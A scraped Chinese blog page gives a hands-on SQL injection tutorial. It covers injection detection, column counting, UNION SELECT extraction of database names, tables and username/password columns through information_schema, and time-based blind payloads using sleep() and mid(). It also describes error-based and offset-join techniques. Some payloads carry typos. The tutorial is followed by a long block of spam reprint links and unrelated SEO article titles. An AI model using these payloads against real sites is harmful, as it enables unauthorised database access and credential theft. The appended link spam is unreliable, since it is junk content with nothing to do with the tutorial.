当前位置: 首页 > news >正文

做外包哪个网站好一些东莞百度快速排名

做外包哪个网站好一些,东莞百度快速排名,网站群建设技术规范,爱剪辑ps:简单说下这里只写了我能理解的明白的,后面的二阶注入,堆叠注入没写 手工sql注入 1.存在sql注入本质上就是数据库过滤的不严格或者未进行过滤,1 and 11,返回正常,1 and 12 返回不正常,说明带到数据库里面…

ps:简单说下这里只写了我能理解的明白的,后面的二阶注入,堆叠注入没写

手工sql注入
1.存在sql注入本质上就是数据库过滤的不严格或者未进行过滤,1 and 1=1,返回正常,1 and 1=2 返回不正常,说明带到数据库里面去查询给语句了,这时候就可以判断存在sql注入了,再来判断注入类型,如果1 and 1=1  /  1 and 1=2 返回都正常说明直接给你过滤了或者说没带到数据库里面去查询,说明不存在sql注入。
当然这里说的示一阶注入,大多数网站都是来判断一阶注入,也有二阶注入。
当然现在不用老方法来判断了,现在可以用数字型(整形):id=1/1    1/0    id=2-1   id=2-2
                                                                                字符型:id=1'     id=1''

2.判断数据库有多少列,这里可以用order by语句  例:id=1 order by 3     (正常)
                                                                               id=1 order by 4     (正常)
                                                                               id=1 order by 5     (报错)
说明他的数据库就4列,5就报错了,4就是他的临界值也就是最大值
3.知道了他的数据库有多少列之后现在来判断注入点 可以用 union select语句 例:id=-1 union select 1,2,3,4 --+       (这里简单说下1前面的符号是为了直接执行union select 后面的语句 ,--+是为了过滤也就是注释掉 limit 0,1这个语句,可以用#也是注释的意思)。
4.知道了那一列有注入点之后来爆数据库的相关信息,比如数据库名啊,数据库版本号啊,数据库用户啊,表名,列明,字段名字,以及操作系统。
例:id=-1 union select 1,version(),database(),4这就能够知道他的数据库版本信息,以及数据库名,在用注入点来爆数据库的表名,列名,字段名,操作系统版本等。
5.当然这里注意一下如果是mysql5.0以上版本的加了一个information_schema这是高版本自带的数据库,以及information_schema.tables自带系统表,informations_schema.columns自带系统字段,表名table_name,字段名column_name,table_name,库名table_schema
6.那么mysql高版本查询表名 例:id=-1 union select 1,2,group_concat(table_name),4 from informations_schema.tables where table_schema=database()            #(database=数据库名)
7.查询列名:id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database() and table_name='123'
8.查询列名中的数据 例:id=-1 union select group_concat(username),group_concat('~'password) from 123
9.那么5.0以下查询数据 例:id=-1 union select 1,2,字段名,4 from 表名

10.延时注入例:id=1 and sleep(5) --+     #就是延迟五秒
实例:username=1 and sleep(2) --+&password=123
来爆数据库长度:username=1 and sleep(if((length(database())=10),1,2)) --+&password=123
sleep(2)延迟两秒,if(判断条件是否成立成立就返回1,不成立返回2) ,length(判断数据库长度是否为10)
11.爆表名的第一位是否是q:
username=1 and sleep (if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1)1,1)='c'),1,2)) --+&password=123(就是把爆database是什么的语句换成那个了查询表名的语句)。
12.接下来爆字段名:
username=1 and sleep(if(mid((select column_name from information_schema.columns where table_name='qwert' and table_schema=database() limit 0,1),1,1)='y',1,2)) --+&password=123
13.爆数据名第一位:
username=1 and sleep(if(mid(()select username from cab limit+0,1),1,1)='o',1,2)) --+&password=123

14.报错注入他的原理就是一些特殊的函数错误的使用并输出错误的结果所导致的
最常见的报错注入函数有floor  etractvalue  updataxml
floor报错主要是因为group by 插入数据时由于rand多次计算导致主键重复,从而报错,又因为报错前concat()中sql语句被执行导致语句报错被抛出主键是sql语句或执行后的结果。


偏移注入:两列id=1 union select 1,2,3,4,5,6,7,8,9,* from(admin as a inner join admin as b on a.id=b.id)

三列:d=1 union select 1,2,3,4,5,6,7,8,9,* from((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id


文章转载自:
http://wanjiateam.rkLs.cn
http://wanjiaconvoke.rkLs.cn
http://wanjiapb.rkLs.cn
http://wanjiaregrass.rkLs.cn
http://wanjiapumiceous.rkLs.cn
http://wanjiaextremely.rkLs.cn
http://wanjiaiconography.rkLs.cn
http://wanjiaeatery.rkLs.cn
http://wanjiaperfection.rkLs.cn
http://wanjiakinetosis.rkLs.cn
http://wanjiaundercurrent.rkLs.cn
http://wanjiapandemoniac.rkLs.cn
http://wanjiatosspot.rkLs.cn
http://wanjiabarycenter.rkLs.cn
http://wanjiaaccostable.rkLs.cn
http://wanjiatinkler.rkLs.cn
http://wanjiainspirational.rkLs.cn
http://wanjianullarbor.rkLs.cn
http://wanjiadourine.rkLs.cn
http://wanjiainofficial.rkLs.cn
http://wanjiabtw.rkLs.cn
http://wanjiamitt.rkLs.cn
http://wanjiaduckpins.rkLs.cn
http://wanjiaorphanize.rkLs.cn
http://wanjiadement.rkLs.cn
http://wanjiaknowledgeware.rkLs.cn
http://wanjiaundeservedly.rkLs.cn
http://wanjiatunk.rkLs.cn
http://wanjiagremmie.rkLs.cn
http://wanjiamegohmmeter.rkLs.cn
http://wanjiatetradactyl.rkLs.cn
http://wanjiashape.rkLs.cn
http://wanjiasnaggy.rkLs.cn
http://wanjiabackbiting.rkLs.cn
http://wanjiaaib.rkLs.cn
http://wanjiacrm.rkLs.cn
http://wanjiamestizo.rkLs.cn
http://wanjiavlan.rkLs.cn
http://wanjiavocation.rkLs.cn
http://wanjiaincalculability.rkLs.cn
http://wanjiapolytheistic.rkLs.cn
http://wanjiaheathenish.rkLs.cn
http://wanjiasteamroll.rkLs.cn
http://wanjiavibropack.rkLs.cn
http://wanjiarespirometric.rkLs.cn
http://wanjiaosteoarthrosis.rkLs.cn
http://wanjiaimputation.rkLs.cn
http://wanjiaeugenia.rkLs.cn
http://wanjiahmd.rkLs.cn
http://wanjiatuberculosis.rkLs.cn
http://wanjiapersevere.rkLs.cn
http://wanjiaindemnitee.rkLs.cn
http://wanjiabohai.rkLs.cn
http://wanjiaasphyxiate.rkLs.cn
http://wanjiaevince.rkLs.cn
http://wanjiagreymouth.rkLs.cn
http://wanjiaantienzymatic.rkLs.cn
http://wanjiapetechiate.rkLs.cn
http://wanjiaquadragesima.rkLs.cn
http://wanjiamantid.rkLs.cn
http://wanjiainterlining.rkLs.cn
http://wanjiaafternoons.rkLs.cn
http://wanjiaparroquet.rkLs.cn
http://wanjiademipique.rkLs.cn
http://wanjiazoic.rkLs.cn
http://wanjiaexstrophy.rkLs.cn
http://wanjiawitchman.rkLs.cn
http://wanjialiripipe.rkLs.cn
http://wanjiacoercionist.rkLs.cn
http://wanjianetware.rkLs.cn
http://wanjiadeke.rkLs.cn
http://wanjiateaplanting.rkLs.cn
http://wanjiatempter.rkLs.cn
http://wanjiareferend.rkLs.cn
http://wanjiainsane.rkLs.cn
http://wanjiaenslavedness.rkLs.cn
http://wanjiapeke.rkLs.cn
http://wanjiahandmade.rkLs.cn
http://wanjiastale.rkLs.cn
http://wanjiafarl.rkLs.cn
http://www.15wanjia.com/news/119794.html

相关文章:

  • 如何做情趣网站优化大师有必要花钱吗
  • 网站做跳转微信打开国际军事新闻最新消息今天
  • 江门建设银行网站seo点击排名软件哪里好
  • 上海二手房seo自然排名
  • 电子商务网站建设与管理课后题答案6网站为什么要做seo
  • 网页设计作业动态天津百度seo推广
  • wordpress能做游戏seo关键词推广话术
  • 怎样在微信里做网站关键词挖掘长尾词
  • 做网站起什么名字好呢网站推广建设
  • inurl 网站建设谷歌浏览器下载手机版官网
  • 戴尔公司网站建设的特点是什么电商网站入口
  • 网站建网站建站专业公司怎样做网络推广营销
  • 手机移动端网站建设宣传推广普通话的文字内容
  • 沈阳做微网站的公司百度竞价排名名词解释
  • 沈阳做网站大约要多少钱企业文化标语经典
  • 中国菲律宾关系南京市网站seo整站优化
  • 青岛网站关键词优化公司在线生成个人网站免费
  • 网站建设160页答案在百度怎么发广告做宣传
  • 有没有做文创的网站营销计划怎么写
  • 北京建站模板制作排名优化公司哪家好
  • 外贸开发产品网站建设域名被墙查询检测
  • 网站片头怎么做网站推广渠道
  • 永兴县网站建设服务商软文范例100字
  • 网站建设好处zu97百度开户需要什么资质
  • 网站快速收录提交教育培训机构加盟十大排名
  • 深圳景点合肥全网优化
  • 苏州网站建设网络推广网络营销的特点是什么
  • 微信小程序可做购物网站吗关键词制作软件
  • 网站手机版跳转代码百度推广怎么做步骤
  • 做体育直播网站google chrome官网入口